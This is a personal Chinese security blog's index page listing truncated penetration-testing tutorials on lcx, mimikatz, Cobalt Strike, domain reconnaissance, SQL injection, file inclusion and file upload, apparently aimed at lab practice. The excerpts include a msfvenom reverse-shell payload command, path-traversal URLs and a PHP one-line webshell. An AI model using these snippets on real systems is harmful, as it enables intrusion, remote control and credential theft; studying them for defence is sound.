Kyon-H Blog

「离开世界之前 一切都是过程」

lcx 端口转发工具使用教程

lcx 端口转发工具

1. lcx 简介 lcx 是一款强大的内网端口转发工具,lcx 端口转发工具用于将内网主机开放的内部端口映射到外网主机 (有公网 IP)任意端口。它是一款命令行工具,当然也可以在有权限的 webshell 下执行,正因如此 lcx 常被认为是一款黑客入侵工具,lcx 端口转发工具在内网入侵渗透中起着重要的角色。lcx 端口转发的原理就是使不同端口之间形成一个回路。它常用于外网连接内网 3...

Posted by Kyon-H on July 30, 2024

mimikatz 使用教程

mimikatz

[!NOTE] 项目地址:gentilkiwi/mimikatz: A little tool to play with Windows security 1. 基本介绍 mimikatz 是一款功能强大的轻量级进程调试工具,在安全领域最大的亮点就是他可以直接从 lsass 中获取当前处于 Active 系统的登录密码 2. 基本使用 2.1. 获取本地密码 获取调试权限 ...

Posted by Kyon-H on July 30, 2024

Cobalt Strike 使用方法

Cobalt Strike 使用方法

1. Cobalt Strike 简介 Cobalt Strike::C/S 架构的商业渗透软件,适合多人进行团队协作,可模拟 APT 做模拟对抗,进行内网渗透。 其集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe 木马生成,win dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java 执行,浏览器自...

Posted by Kyon-H on July 29, 2024

域内信息搜集

域内信息搜集

1. 用户权限 1.1. 查看当前用户 1 2 3 whoami # 域名\用户名 # 机器名\用户名 在域中本地普通用户只能查询本机相关信息,不能查询域内信息,而本地管理员用户和域内用户可以查询域内信息。 其原理是:域内的所有查询都是通过域控制器实现的(基于LDAP协议),而这个查询需要经过权限认证,所以,只有域用户才拥有这个权限;当域用户执行查询命令时,会自动使用 Kerber...

Posted by Kyon-H on July 25, 2024

Windows 主机信息搜集

Windows 主机信息搜集

1. 前置条件 反弹 shell Kali: 1 2 3 4 5 6 7 msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o shell.exe msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_t...

Posted by Kyon-H on July 24, 2024

内网渗透基础

内网渗透基础

网络安全分类: web安全: 主机安全:提权、root、 内网安全:域、工作组、横向移动、端口转发、代理、持久化 Windows 域(Windows Domain) 是由 Microsoft Windows Server 操作系统所管理的一种网络结构,常用于企业或组织内部。它实现了对网络中用户账号、计算机、权限、安全策略等资源的集中管理与控制。 域控制器(Domai...

Posted by Kyon-H on July 23, 2024

SQL注入漏洞

SQL Injection

1. SQL注入分类 按SQLMap中的分类来看,SQL注入类型有以下 5 种: UNION query SQL injection(可联合查询注入) Stacked queries SQL injection(可多语句查询注入) Boolean-based blind SQL injection(布尔型注入) Error-based SQL injection(报错型...

Posted by Kyon-H on July 9, 2024

File Include

文件包含漏洞

1. 文件包含伪协议 1.1.1. 直接包含 1 2 http://pikachu.to/vul/dir/dir_list.php?title=../../../../../../../\windows\system32\drivers\etc\hosts http://pikachu.to/vul/dir/dir_list.php?title=../../../../../../win...

Posted by Kyon-H on June 19, 2024

File-Upload

File-Upload

1. 文件上传漏洞介绍 几乎每个网站中都会有文件上传的功能,譬如上传头像、视频、压缩包等。网站上传功能点未对客户端上传的文件进行严格的限制和过滤,导致恶意用户将一些恶意的文件或脚本上传到服务器并 url 访问执行,进而达到控制网站的目的,这就是文件上传漏洞。 1.1. 文件上传漏洞前提 能成功上传木马或脚本 知道上传后的路径 上传的木马或脚本能被执行 图片马需要配合文...

Posted by Kyon-H on June 17, 2024

总结

总结

1. 常见危险函数 eval () mixed eval ( string $code ) 函数 eval() 语言结构是非常危险的, 因为它允许执行任意 PHP 代码。<?php @eval($_POST['v']);?>—— 常见的一句话木马。 assert() bool assert ( mixed $as...

Posted by Kyon-H on April 19, 2024

FEATURED TAGS
DVWA 靶场实战 Vulnhub DC系列 服务器 CTFHub Ubuntu 内网防护 渗透测试
ABOUT ME